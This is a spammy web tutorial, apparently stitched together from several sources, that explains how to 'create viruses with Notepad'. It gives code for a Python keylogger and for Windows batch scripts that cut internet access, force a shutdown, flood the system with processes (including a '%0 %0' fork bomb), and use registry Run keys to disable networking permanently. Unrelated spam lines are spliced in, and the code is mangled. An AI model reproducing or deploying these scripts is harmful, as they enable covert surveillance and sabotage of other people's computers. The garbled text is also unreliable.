Breaking News

Main Menu

How To Create Mobile Virus Using Notepad

четверг 09 апреля admin 7

Contents.What is a keylogger?Before that, it’s important to know what is a keylogger actually(in case you did not already know). It is a program that records your keystrokes and saves them as a log file either onto a server over a reverse TCP tunnel or on the local machine itself.

Virus 2: Make a Fake Virus Batch File: This is also a funny virus prank that I recently came across. The best thing about this prank is that it resembles an original virus attack. Just try it by yourself to see whats happens. Step 1: Open Notepad. Step 2: Copy and paste the below code in your notepad. To create a virus using notepad you should know that notepad can be used as source file for batch file programming. When we save notepad file as.bat or.cmd it becomes batch file. Now you should know how to use command prompt. Such as here we are using commands for shutdown or restart.

The server, in this case, is the one hosted by the hacker(you).Also Read-So since now, you know what a keylogger is. let’s have a look at a step by step guide on how to make a keylogger. How To Create a Keylogger Using Notepad?Let’s get started!

Open notepad on your computer and paste the following code in it:import pyHook, pythoncom, sys, logging# feel free to set the filelog to a different file name/locationfilelog = 'keyloggeroutput.txt'def OnKeyboardEvent(event):logging.basicConfig(filename=filelog, level=logging.DEBUG, format='%(message)s')chr(event.Ascii)logging.log(10,chr(event.Ascii))return Truehooksmanager = pyHook.HookManagerhooksmanager.KeyDown = OnKeyboardEventhooksmanager.HookKeyboardpythoncom.PumpMessages2. Save the file as keylogger.pyw3. Fire up your keyloggerDouble-click on the file you just created and test it out, then start typing.When you want to stop logging, open up task manager and kill all the “python” processes.

Then look for keyloggeroutput.txt in the same directory were the something.pyw is. Open it up and you should see whatever you typed.NOTE: You may see some weird looking character if you open it with notepad, those characters means you hit the backspace key.So this is a simple keylogger that saves the keystrokes on the local machine. You can explore further for more complex keyloggers.

A computer virus is a malicious program that tries to harm your computer by replicating itself and modifying other programs. Almost all of us might have faced a virus attack when downloading files from the internet.

In this article, I will explain how to create a virus and how it actually works. If you are facing virus attacks on your computer then make sure to read this guide.

Now computer viruses are actually a program that is coded by the bad guys. Assuming that most of you guys don’t know any programming languages, we will use the Windows batch scripting commands.

It is kind of a scripting language that you can use to play around with Windows.

Let’s start by creating a simple and harmless virus which is called ECLAIR. It is used to test if your antivirus is working or not.

Contents

  • 3 3 – Deleting System32 Prank

1 – Eclair Test File – Test Your Antivirus

Now, this is not a computer virus, it is a simple block of string which triggers your antivirus.

Open notepad and paste the following code:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Now save the file as eclair.com and make sure to select save as type to All files (*.*)

As soon as I saved the file I got a virus detection notification from Windows Defender.

2 – Stop Internet Access

By using this batch file you can stop someone Internet access. Again it is a harmless virus that can be reversed easily.

Again open notepad and paste the below code.

@Echo off
Ipconfig /release

Now save the file as virus.bat and make sure to select save as type to All files (*.*)

To get internet back again, open command prompt and type ipconfig /renew and hit enter.

3 – Deleting System32 Prank

I’m going to show you how to create a virus that will show a warning message about deleting system files. It’s a harmless virus, it won’t delete any of your files.

Simply paste the below code and save it with .bat extension. You can name the file anything you want.

@echo off
@echo Virus Detceted!!!
pause
@echo Trying to destroy virus
pause
@echo 25%
pause
@echo 50%
pause
@echo 75%
pause
@echo 100%
pause
@echo Error!!!!!!!!!!!!
@echo Error!!!!!!!!!!!!
@echo Error!!!!!!!!!!!!
pause
@echo opening system32
@echo Deleting system file 5454
@echo Deleting system file 2395
@echo Deleting system file 3454
pause
@echo system error 45343
pause
@echo system cannot operate without all system files!!!!
pause
@echo kfcwjewilfejkfewvi494iwefihfeiwjecfowe
@echo ewijfweclkifjwefweoifvwjoafvijwojirfijwe
@echo rle2krldrkewlkfcklweklelwlkewlkewl;cee
pause
@echo %system%shutdown%error%
shutdown -s

This virus will shut down the computer at the end which makes it more realistic. If you don’t want the PC to shut down you can remove the shutdown -s code.
Read – Hilarious Computer Pranks of All Time

4 – Matrix Hack

This fake virus will open notepad and give it a matrix effect.

Use the below code and save it with .bat extension.

@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

@echo Virus Detected!!!

goto start

Below are some harmful viruses which can freeze and destroy your PC.

5 – App Launcher

How To Create Mobile Virus Using Notepad

Want to create an app bomber? I’m going to show you how to create a virus that launches all the Microsoft apps and basically freezes your computer.

Paste the below code and save it with .bat extension.

@echo off
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

Night preface study guide answers. Restarting the PC will fix it, still not recommended to use it.

6 – Endless Notepad Popup

This code will open endless notepad popups until your PC crashes.

@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top

7 – Background Process Bomber

The below code will create an unlimited background process which will result in your computer freezing and crashing at the end.

Paste the below code in notepad and save it with .bat extension.

%0 %0

8 – Disable Internet Connection

This is a harmful notepad virus. This will permanently disable the internet connection. You will have to install a fresh copy of Windows to get the internet connection back. Microsoft office 2011 14.2.2 and office 2008 12.3.3 for mac torrent.

Use the below code:

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho Your Network has been HACKED!
PAUSE

These were some of the simple computer viruses created using notepad. I’m sure you have learned how to create a computer virus using notepad.